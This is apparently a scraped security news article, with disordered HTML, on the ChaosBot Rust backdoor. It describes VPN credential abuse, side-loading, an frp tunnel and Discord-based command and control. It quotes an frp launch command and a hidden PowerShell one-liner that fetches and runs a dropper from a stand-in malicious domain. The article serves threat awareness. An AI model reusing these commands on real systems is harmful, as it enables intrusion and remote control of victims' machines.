ChaosBot surfaced in late September 2025 as a sophisticated Rust-based backdoor targeting enterprise networks. Initial investigations revealed that threat actors gained entry by exploiting compromised CiscoVPN credentials coupled with over-privileged Active Directory service accounts.<\/p>\n
Once inside, ChaosBot was stealthily deployed via side-loading techniques using the legitimate Microsoft Edge component identity_helper.exe<\/em> from the The malware\u2019s Rust<\/a> implementation and reliance on Discord for its command and control (C2) operations underscore an innovative blend of modern development practices and misappropriated mainstream services.<\/p>\n eSentire analysts noted<\/a> that the threat actor behind ChaosBot operated through a Discord profile named \u201cchaos_00019,\u201d suggesting a deliberate attempt to mask communications within popular social platforms.<\/p>\n Victim demographics indicate a focus on Vietnamese-speaking environments, although lateral movement experiments on differing targets have been observed.<\/p>\n The combination of VPN credential<\/a> abuse and over-privileged AD accounts enabled seamless WMI-based remote execution, facilitating widespread deployment before detection.<\/p>\n Following initial compromise, ChaosBot conducts reconnaissance and establishes a fast reverse proxy (frp) tunnel to maintain persistent access.<\/p>\n The malware downloads This sequence creates a hidden communication channel over port 7000 to a remote AWS host, bypassing perimeter defenses and supporting subsequent lateral movements.<\/p>\n The core infection mechanism of ChaosBot leverages two primary vectors: credential-based access and malicious Windows shortcuts.<\/p>\n In the former, valid CiscoVPN credentials and an over-privileged AD account named \u201cserviceaccount\u201d are used to run WMI commands that drop and execute the ChaosBot payload ( The shortcut vector involves phishing emails containing This PowerShell command resembles:<\/p>\n Upon execution, ChaosBot validates its embedded Discord bot token with a GET request to Subsequent shell commands fetched from Discord messages are executed in new PowerShell processes prefixed with UTF-8 encoding directives to preserve output integrity.<\/p>\n Results, including stdout, stderr, screenshots, or file attachments, are returned to the threat actor\u2019s Discord channel via multipart\/form-data POST requests.<\/p>\n This dual-vector approach\u2014credential exploitation and social engineering<\/a> using malicious shortcuts\u2014combined with the use of legitimate services for C2, makes ChaosBot particularly challenging to detect and remediate.<\/p>\n Asset masquerading through built-in Windows binaries and rigorous encoding practices further obscure its presence within targeted environments.<\/p>\n Follow us on\u00a0Google News<\/a>,\u00a0LinkedIn<\/a>,\u00a0and\u00a0X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0Set CSN as a Preferred Source in\u00a0Google<\/a>.<\/strong><\/p>\n The post New Chaosbot Leveraging CiscoVPN and Active Directory Passwords to Execute Network Commands<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\nC:UsersPublicLibraries<\/code> directory.<\/p>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjKZunEOpPWxwFZPrn4reyhA8EtgGQkrq2wSuyxdKNhfT2w7HLysOmFntJi7LRIIo-j2aTtDwh6I4A0iil9iJAJlk48KibWYZMcfXuCb4P2t7cc_CS2sxihPXYFcLjvMXJp_HCsl7tWz3vdcUn8s1XNICJpDrUHOBA4Oes5DNJymgMdhxhby8F8_wzD24w\/s16000\/Attack%2520Chain%2520%28Source%2520-%2520eSentire%29.webp?ssl=1\")
frp<\/code> and its configuration file (node.ini<\/code>) into C:UsersPublicMusic<\/code>, then launches the proxy via a PowerShell-executed shell command:-<\/p>\npowershell -Command \"$OutputEncoding = [System.Text.Encoding]::UTF8; C:UsersPublicMusicnode.exe -c C:UsersPublicMusicnode.ini\"<\/code><\/pre>\nInfection Mechanism<\/strong><\/h2>\n
msedge_elf.dll<\/code>) on remote hosts.<\/p>\n.lnk<\/code> files that execute a PowerShell<\/a> one-liner to fetch and launch ChaosBot while opening a decoy PDF themed after the State Bank of Vietnam to distract the user.<\/p>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhHaBwxuJ01-ukAMGYYPtuVSjTPZ1sm8JssS-CpuVhEeNMmbKBEQO5_zsQ1ixzGet_mBeyNC8EU_dBSn6S8BMFqT042b916-30ehJ26FlmLiPa_FQPoODmtHzSKNP9xV60MwawXugxRRc7JhnEn2Hmc9S2L8cbY0xOMeO1dNHVovLbGvOuaxNCG2oEKfIw\/s16000\/PowerShell-based%2520malicious%2520shortcut%2520%28Source%2520-%2520eSentire%29.webp?ssl=1\")
powershell -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri 'hxxps:\/\/malicious-domain\/dropper.exe' -OutFile $env:Tempchaosbot.exe; Start-Process $env:Tempchaosbot.exe\"<\/code><\/pre>\nhttps:\/\/discord.com\/api\/v10\/users\/@me<\/code>, then creates a dedicated channel named after the victim\u2019s hostname using a POST to https:\/\/discord.com\/api\/v10\/guilds\/<GUILD_ID>\/channels<\/code>.<\/p>\n